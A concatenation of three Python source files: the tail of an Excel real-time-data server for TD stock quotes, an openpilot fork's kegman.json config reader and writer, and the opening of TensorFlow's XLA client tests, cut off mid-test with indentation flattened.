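# and signal Excel, retrying on transient COM errors.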
logging.debug("_update_msg_handler: start")
self.start_conn_event.wait()
if self.shutdown:
return
self.td_cli.connect(self._on_quote_received)
self.ready_to_send.set()
logging.debug("_update_msg_handler: ready_to_send.set()")
while not self.shutdown:
quotes = await self.update_message_queue.get()
try:
# Check if any of our topics have new info to pass on
if not len(self.topics):
pass
for quote in quotes:
ticker = quote.ticker
for k, v in quote.fields.items():
if (ticker, k) in self.topics_by_key:
topic = self.topics_by_key[(ticker, k)]
topic.Update(v)
if topic.HasChanged():
self.updatedTopics[topic.topicID] = topic.GetValue()
if self.updatedTopics:
# Retry when com_error occurs
# e.g. RPC_E_SERVERCALL_RETRYLATER = com_error(-2147417846, 'The message filter indicated that the application is busy.', None, None)
while True:
try:
self.SignalExcel()
break
except pythoncom.com_error as error:
await asyncio.sleep(0.01)
except Exception as e:
logging.error("Update: {}".format(repr(e)))
#raise COMException(desc=repr(e))
async def _send_msg_handler(self) -> None:
await self.ready_to_send.wait()  # asyncio.Event.wait() is a coroutine and must be awaited
logging.debug(f"_send_msg_handler: ready_to_send signalled")
if self.shutdown:
return
while not self.shutdown:
msg = await self.send_message_queue.get()
if msg:
self.td_cli.send(msg)
def CreateTopic(self, TopicId, TopicStrings=None):
"""Topic factory. Builds a StockTickTopic object out of the given TopicStrings."""
if len(TopicStrings) >= 2:
ticker, field = TopicStrings
logging.info(f"CreateTopic {TopicId}, {ticker}|{field}")
if not ticker:
return None
if not self.start_conn_event.is_set():
self.start_conn_event.set()
new_topic = StockTickTopic(TopicId, TopicStrings)
ticker = ticker.upper()
self.topics_by_key[(ticker, field)] = new_topic
subscribe_msg = {
"type": "subscribe",
"symbol": ticker,
"field": field
}
logging.debug(subscribe_msg)
try:
self.async_loop.call_soon_threadsafe(lambda: self.send_message_queue.put_nowait(subscribe_msg))
except Exception as e:
logging.error("CreateTopic: {}".format(repr(e)))
else:
logging.error(f"Unknown param: CreateTopic {TopicId}, {TopicStrings}")
return None
return new_topic
class SimpeVarTopic(rtd.RTDTopic):
def __init__(self, topicID, TopicStrings):
super(SimpeVarTopic, self).__init__(TopicStrings)
try:
cmd, var = self.TopicStrings
self.topicID = topicID
except Exception as e:
raise ValueError("Invalid topic strings: %s" % str(TopicStrings))
# setup our initial value
self.checkpoint = self.timestamp()
self.SetValue(var)
def timestamp(self):
return datetime.now()
def Update(self, value):
self.SetValue(value)
self.checkpoint = self.timestamp()
class StockTickTopic(rtd.RTDTopic):
def __init__(self, topicID, TopicStrings):
super(StockTickTopic, self).__init__(TopicStrings)
try:
ticker, field = self.TopicStrings
self.topicID = topicID
self.ticker = ticker
self.field = field
except Exception as e:
raise ValueError("Invalid topic strings: %s" % str(TopicStrings))
# setup our initial value
self.checkpoint = self.timestamp()
self.SetValue("#WatingDataForData")
def __key(self):
return (self.ticker, self.field)
def __hash__(self):
return hash(self.__key())
def __eq__(self, other):
if isinstance(other, StockTickTopic):
return self.__key() == other.__key()
return NotImplemented
def timestamp(self):
return datetime.now()
def Update(self, value):
self.SetValue(value)
self.checkpoint = self.timestamp()
if __name__ == "__main__":
import win32com.server.register
# Register/Unregister TDServer example
# eg. at the command line: td_rtd.py --register
# Then type in an excel cell something like:
# =RTD("TD.RTD","","MSFT","last-price")
win32com.server.register.UseCommandLine(TDServer)
|
kegman_conf.py
|
import json
import copy
import os
import threading
import time
from selfdrive.swaglog import cloudlog
from common.basedir import BASEDIR
def read_config():
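# Load kegman.json, backfill any missing keys with defaults, migrate a few legacy values,
# and fall back to (and persist) the defaults when the file is absent.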
default_config = {"cameraOffset": 0.06, "lastTrMode": 1, "battChargeMin": 90, "battChargeMax": 95,
"wheelTouchSeconds": 1800, "battPercOff": 25, "carVoltageMinEonShutdown": 11200,
"brakeStoppingTarget": 0.25, "angle_steers_offset": 0, "brake_distance_extra": 1,
"lastALCAMode": 1, "brakefactor": 1.2, "lastGasMode": 0, "lastSloMode": 1,
"leadDistance": 5}
if os.path.isfile(kegman_file):
with open(kegman_file, "r") as f:
try:
config = json.load(f)
except:
cloudlog.exception("reading kegman.json error")
config = default_config
if "battPercOff" not in config:
config.update({"battPercOff": 25})
if "carVoltageMinEonShutdown" not in config:
config.update({"carVoltageMinEonShutdown": 11200})
if "brakeStoppingTarget" not in config:
config.update({"brakeStoppingTarget": 0.25})
if "angle_steers_offset" not in config:
config.update({"angle_steers_offset": 0})
if "brake_distance_extra" not in config: # extra braking distance in m
config.update({"brake_distance_extra": 1})
if "lastALCAMode" not in config:
config.update({"lastALCAMode": 1})
if "brakefactor" not in config: # brake at 20% higher speeds than what I like
config.update({"brakefactor": 1.2})
if "lastGasMode" not in config:
config.update({"lastGasMode": 0})
if "lastSloMode" not in config:
config.update({"lastSloMode": 1})
if "leadDistance" not in config: # leadDistance only works for Accord and Insight, have not tested other honda vehicles
config.update({"leadDistance": 5.0})
# force update
if config["carVoltageMinEonShutdown"] == "11800":
config.update({"carVoltageMinEonShutdown": 11200})
if int(config["wheelTouchSeconds"]) < 200:
config.update({"wheelTouchSeconds": 1800})
if int(config["battChargeMin"]) == 85:
config.update({"battChargeMin": 90})
if int(config["battChargeMax"]) == 90:
config.update({"battChargeMax": 95})
else:
write_config(default_config)
config = default_config
return config
def kegman_thread(): # read and write thread; now merges changes from file and variable
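# Every thread_interval seconds: re-read the file, merge keys changed on disk (unless they
# were just written from code), write back any in-memory changes, and exit after
# thread_timeout minutes of inactivity.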
global conf
global thread_counter
global variables_written
global thread_started
global last_conf
try:
while True:
thread_counter += 1
time.sleep(thread_interval) # every n seconds check for conf change
with open(kegman_file, "r") as f:
conf_tmp = json.load(f)
if conf != last_conf or conf != conf_tmp: # if either variable or file has changed
thread_counter = 0
if conf_tmp != conf: # if change in file
changed_keys = []
for i in conf_tmp:
try:
if conf_tmp[i] != conf[i]:
changed_keys.append(i)
except: # if new param from file not existing in variable
changed_keys.append(i)
for i in changed_keys:
if i not in variables_written:
conf.update({i: conf_tmp[i]})
if conf != conf_tmp:
write_config(conf)
last_conf = copy.deepcopy(conf)
variables_written = []
if thread_counter > ((thread_timeout * 60.0) / thread_interval): # if no activity for thread_timeout minutes
print("Thread timed out!")
thread_started = False
return
except:
print("Error in kegman thread!")
cloudlog.warning("error in kegman thread")
thread_started = False
def write_config(conf): # never to be called outside kegman_conf
if BASEDIR == "/data/openpilot":
with open(kegman_file, "w") as f:
json.dump(conf, f, indent=2, sort_keys=True)
os.chmod(kegman_file, 0o764)
def save(data): # allows for writing multiple key/value pairs
global conf
global thread_counter
global thread_started
global variables_written
thread_counter = 0
if not thread_started and BASEDIR == "/data/openpilot":
threading.Thread(target=kegman_thread).start() # automatically start write thread if file needs it
thread_started = True
print("Starting thread!")
for key in data:
variables_written.append(key)
conf.update(data)
def get(key_s=""): # can get multiple keys from a list
global thread_counter
if key_s == "": # get all
return conf
else:
thread_counter = 0
if type(key_s) == list:
return [conf[i] if i in conf else None for i in key_s]
if key_s in conf:
return conf[key_s]
else:
return None
thread_counter = 0 # don't change
thread_timeout = 5.0 # minutes to wait before stopping thread. reading or writing will reset the counter
thread_interval = 30.0 # seconds to sleep between checks
thread_started = False
kegman_file = "/data/kegman.json"
variables_written = []
conf = read_config()
last_conf = copy.deepcopy(conf)
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
from absl.testing import absltest
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
class ComputationTest(absltest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
return xla_client.execute_with_python_values(compiled_c, arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol), c,
arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
builder.Mul(p0, p1)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumF32(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF16(self):
c = self._NewComputation()
c.Mul(
c.Constant(np.array([2.5, 3.3, -1.2, 0.7], np.float16)),
c.Constant(np.array([-1.2, 2, -2, -3], np.float16)))
self._ExecuteAndCompareClose(
c, expected=np.array([-3, 6.6, 2.4, -2.1], np.float16), rtol=2e-3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])), c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(
c.Constant(NumpyArrayS32([-2])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(
c.Constant(NumpyArrayS32([-1])), c.Constant(NumpyArrayS32([1])))
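# -1 as a 32-bit word is 0xFFFFFFFF; a logical right shift by 1 yields 0x7FFFFFFF == 2**31 - 1.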
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
arg_buffers = [xla_client.Buffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)], expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().Compile()
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertEmpty(pieces)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
local_buffer = xla_client.Buffer.from_pyval(t)
# Run the test twice to verify that the original tuple buffer remains valid
# even after destructuring.
for _ in range(2):
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertLen(got, 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testMakeTuple(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
b0 = xla_client.Buffer.from_pyval(t[0])
b1 = xla_client.Buffer.from_pyval(t[1])
btup = xla_client.Buffer.make_tuple([b0, b1], device=0)
pieces = btup.destructure()
self.assertLen(pieces, 2)
array0, array1 = pieces
np.testing.assert_equal(
np.array([1, 2, 3, 4], dtype=np.float32), array0.to_py())
np.testing.assert_equal(
np.array([2, 3, 4, 5], dtype=np.int32), array1.to_py())
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.Buffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = xla_client.Buffer.from_pyval(arg0)
arg1_buffer = xla_client.Buffer.from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
  single XLA ops. As few additional ops as possible are added around the op
  being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.PrimitiveType.PRED,
np.int32: xla_client.PrimitiveType.S32,
np.int64: xla_client.PrimitiveType.S64,
np.float32: xla_client.PrimitiveType.F32,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.PrimitiveType.S32,
np.float32: xla_client.PrimitiveType.F32,
}
xla_x64_types = {
np.int64: xla_client.PrimitiveType.S64,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testReplicaId(self):
c = self._NewComputation()
_ = c.ReplicaId()
self._ExecuteAndCompareExact(c, expected=0)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
